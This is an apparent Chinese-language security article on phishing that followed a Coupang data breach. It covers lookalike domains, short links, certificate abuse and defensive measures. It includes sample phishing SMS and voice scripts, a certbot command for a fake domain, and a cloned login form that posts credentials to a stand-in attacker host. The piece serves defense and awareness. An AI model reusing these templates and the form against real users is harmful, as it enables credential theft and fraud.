
2026年1月,韩国最大电商平台Coupang的一次数据泄露事件,正演变为一场波及数百万用户的网络钓鱼危机。尽管公司坚称支付信息未被窃取,但大量用户的真实姓名、手机号、收货地址乃至近期订单摘要已落入黑产手中。短短数日内,一种高度定制化的“精准钓鱼”攻击迅速蔓延——诈骗者冒充Coupang客服,以“订单异常”“退款处理”“账户安全验证”为由拨打电话或发送短信,诱导用户点击恶意链接、下载伪造App,甚至直接转账至所谓“安全账户”。
据《韩国时报》1月9日报道,已有用户险些被骗。一位化名李女士的消费者接到自称“信用卡配送员”的来电,对方准确报出她的全名、手机号及银行账户后四位,并声称其身份可能已被盗用,“Coupang关联信用卡”正在被非法激活。当她拨打对方提供的“客服热线”(以1544开头的本地号码)后,一名“工作人员”进一步核实了她的账户信息,并要求她“配合资金冻结操作”。所幸她在最后一刻察觉异常,挂断电话。
“最可怕的是,他们知道得太多了。”李女士事后回忆,“如果不是朋友刚经历过类似骗局,我可能已经照做了。”
这并非孤例。随着泄露数据在暗网流通,一场利用真实信息构建信任的钓鱼风暴正在席卷普通消费者。而这场危机,对中国电商生态与个人信息保护体系同样敲响了警钟。

一、从“广撒网”到“点对点”:精准钓鱼如何运作?
传统钓鱼攻击依赖海量发送、低转化率的模式——例如群发“您的包裹滞留,请点击链接更新地址”。由于内容泛泛、缺乏细节,多数用户能轻易识别。
但Coupang事件后出现的钓鱼手段截然不同。攻击者手握真实用户数据,可实现“一人一策”的定制化话术:
短信模板:
【Coupang】尊敬的张伟先生,您于1月5日下单的“无线蓝牙耳机”因仓库系统异常需重新发货。请点击确认收货地址:http://coupang-verify[.]xyz/track?id=AB123
语音诈骗脚本:
“您好,我是Coupang安全中心。检测到您的账户在1月8日有一笔异常登录(IP:首尔),为保障资金安全,请按1转接人工服务……”
由于信息高度吻合(姓名、订单时间、商品名称),用户极易放松警惕。更危险的是,部分诈骗团伙甚至能模拟官方客服的语气、流程和术语,使骗局几可乱真。
“这不是钓鱼,是‘社会工程学狙击’。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“当攻击者掌握你的行为轨迹和身份标签时,防御就从技术问题变成了心理战。”
二、技术拆解:钓鱼链接如何绕过检测?
尽管Coupang官方域名(coupang.com)受严格保护,但攻击者通过多种技术手段制造“视觉可信”的假象。
1. 同形异义域名(Homograph Attack)
利用国际化域名(IDN)中的相似字符,注册形似官方的域名。例如:
正确域名:coupang.com
伪造域名:соupаng.com(使用西里尔字母“с”和“а”)
普通用户肉眼难以分辨,而部分老旧邮件客户端甚至不显示Punycode警告。
2. 子域名伪装
注册看似合法的第三方域名,创建包含品牌关键词的子域:
https://coupang-support.servicehub[.]kr
https://secure.coupang-login[.]net
这类域名虽非官方所有,但因包含“coupang”字样,易被误认为合作方或子业务线。
3. 短链接与动态跳转
为规避URL信誉检测,攻击者常将恶意链接封装在Bitly、TinyURL等短链服务中:
https://bit.ly/3xYzAbc
用户点击后,先经过一层跳转页面(可能显示“加载中…”),再重定向至最终钓鱼站。此过程可绕过静态URL黑名单。
4. HTTPS证书滥用
如今,Let’s Encrypt等免费CA机构可为任意域名签发SSL证书。攻击者只需控制一个域名,即可获得绿色锁标志,制造“安全网站”假象。
# 攻击者申请证书示例(使用Certbot)
certbot certonly --standalone -d fake-coupang-login[.]xyz
结果:浏览器地址栏显示https://fake-coupang-login[.]xyz,并带有有效证书,极大提升可信度。
三、钓鱼页面的技术内核:高仿UI与凭证窃取
一旦用户进入钓鱼页面,攻击即进入收割阶段。现代钓鱼站已远非简陋表单,而是具备以下特征:
1. 像素级UI克隆
攻击者使用工具(如PageRipper、HTTrack)直接抓取Coupang或银行官网前端代码,保留Logo、配色、字体甚至动画效果。例如:
<!-- 伪造的Coupang登录页片段 -->
<div class="login-header">
<img src="https://static.coupangcdn.com/logo.png" alt="Coupang">
</div>
<form action="https://attacker-server.com/steal" method="POST">
<input type="text" name="phone" placeholder="手机号" required>
<input type="password" name="password" placeholder="密码" required>
<button type="submit">登录</button>
</form>
用户几乎无法分辨真假。
2. 多阶段诱导
为降低怀疑,钓鱼流程常分多步进行:
首页显示“订单异常,请登录查看”;
登录后跳转至“安全验证”页面,要求输入短信验证码;
最终页面提示“操作成功”,实则后台已将账号+密码+验证码打包上传。
3. 移动端专属攻击
针对手机用户,攻击者诱导下载“安全插件”或“订单管理App”。这些APK文件通常:
使用与官方相似的图标和包名(如com.coupang.secure);
请求无障碍权限,实现自动填写验证码;
后台静默上传通讯录、短信记录,扩大攻击面。
四、国际镜鉴:从Target到Ticketmaster,数据泄露后的钓鱼潮
Coupang并非首例。过去十年,全球多次大规模数据泄露均伴随精准钓鱼激增。
2013年Target泄露:4000万信用卡信息外泄后,钓鱼邮件以“账单异常”为由诱导用户“验证账户”,导致二次损失。
2018年British Airways事件:38万用户数据泄露后,诈骗者冒充航司发送“航班取消退款”短信,链接指向伪造支付页面。
2024年Ticketmaster breach:黑客在暗网出售5.6亿用户记录,随后出现大量“演唱会门票退款”钓鱼活动,成功率极高。
这些案例揭示一个规律:数据泄露的价值不仅在于直接售卖,更在于作为“信任燃料”驱动后续诈骗。
对中国而言,警示尤为紧迫。国内电商平台(如淘宝、京东、拼多多)拥有十亿级用户数据,若发生类似泄露,后果不堪设想。芦笛强调:“我们不能只关注‘是否泄露’,更要预判‘泄露后会被如何利用’。”
五、防御体系重构:从被动响应到主动免疫
面对精准钓鱼,传统“改密码+发公告”已远远不够。专家建议构建三层防御:
第一层:企业侧——最小化数据暴露面
去标识化处理:在客服系统、物流通知中,避免显示完整手机号或地址。例如,将“1381234”而非“13812341234”;
动态令牌替代静态信息:订单状态查询应通过一次性链接或App内通知,而非短信明文;
强化API安全:防止攻击者通过爬虫或接口漏洞批量获取用户摘要。
第二层:技术侧——智能检测与拦截
部署行为分析引擎:监测异常登录模式(如新设备、异地IP);
启用DMARC强制策略:防止域名被伪造发送钓鱼邮件;
对短链接实施深度解析:安全网关应自动展开短链,检查最终落地页。
例如,使用Python解析Bitly链接:
import requests
def expand_short_url(short_url):
try:
resp = requests.head(short_url, allow_redirects=True, timeout=5)
return resp.url
except:
return None
final_url = expand_short_url("https://bit.ly/3xYzAbc")
if is_malicious(final_url):
block_email()
第三层:用户侧——建立“数字免疫力”
芦笛提出“三不原则”:
不点:任何短信/邮件中的链接,无论多逼真,一律不点;
不输:不在非官方页面输入账号、密码、验证码;
不转:绝不向陌生账户转账,哪怕对方自称“安全中心”。
同时,所有操作必须通过官方App或手动输入官网地址完成。例如,收到“订单异常”通知,应打开Coupang App查看“我的订单”,而非点击链接。
六、法律与生态:个人信息保护需闭环治理
技术防御之外,制度建设同样关键。韩国在Coupang事件后,金融监督院(FSS)已要求电商平台加强与银行、电信运营商的联动,对异常呼叫(如集中拨打1544号段)实施实时阻断。
中国《个人信息保护法》虽已施行,但在“泄露后应急响应”方面仍有空白。芦笛建议:
建立数据泄露影响评估机制,强制企业在72小时内披露受影响字段;
推动跨平台风险共享,如电商平台与支付机构共享可疑IP、设备指纹;
设立用户补偿基金,对因泄露导致的直接经济损失提供先行赔付。
“保护用户,不能只靠道德自觉,而要靠系统性约束。”他说。
七、未来展望:当AI加入钓鱼战场
更令人担忧的是,生成式AI正被用于自动化精准钓鱼。攻击者可输入泄露的用户数据,自动生成个性化话术:
“张先生,您上周购买的婴儿奶粉因批次问题召回,我们将为您安排上门取件并双倍退款。请点击预约时间:...”
语言自然、逻辑严密,远超人工编写水平。而语音克隆技术甚至能模拟客服声音,实现全自动电话诈骗。
对此,防御也需智能化。例如,通过NLP模型识别钓鱼文本中的“诱导性动词”(如“立即”“紧急”“否则失效”),或利用图神经网络分析用户社交关系,判断来电是否合理。
但归根结底,最坚固的防线,仍是用户的清醒认知。
在这场没有硝烟的战争中,每一次点击都可能是陷阱,每一通电话都可能是骗局。而真正的安全,始于对“便利”的审慎,成于对“异常”的敏感。
正如一位网络安全老兵所言:“在数字时代,你的信息就是你的身份。保护它,就是保护你自己。”
编辑:芦笛(公共互联网反网络钓鱼工作组)
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。